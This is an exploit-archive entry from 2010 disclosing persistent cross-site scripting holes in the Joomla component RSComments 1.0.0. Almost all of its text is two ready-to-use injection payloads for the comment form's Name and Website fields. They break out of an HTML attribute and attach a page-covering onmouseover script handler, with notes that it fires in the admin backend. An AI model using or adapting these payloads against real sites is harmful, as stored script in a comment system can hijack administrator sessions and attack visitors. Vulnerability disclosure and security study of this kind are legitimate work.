id: 12792
date: 06/19/2010
title: Joomla Component RSComments 1.0.0 Multiple XSS
author: jdc
cves: 

==============================================
Joomla Component RSComments 1.0.0 Multiple XSS
==============================================


# Exploit Title: Joomla Component RSComments 1.0.0 Multiple XSS Vulnerabilities
# Author: jdc
# Software Link: http://www.rsjoomla.com
# Version: 1.0.0
# Tested on: PHP5, MySQL5
 
Name Field Persistent XSS
-------------------------
 
x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"
 
NOTE: ONLY executes in backend!
 
Website Field Persistent XSS
----------------------------
 
http://x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"
 
NOTE: also executes in backend!



#  0day.today [2023-03-24]  #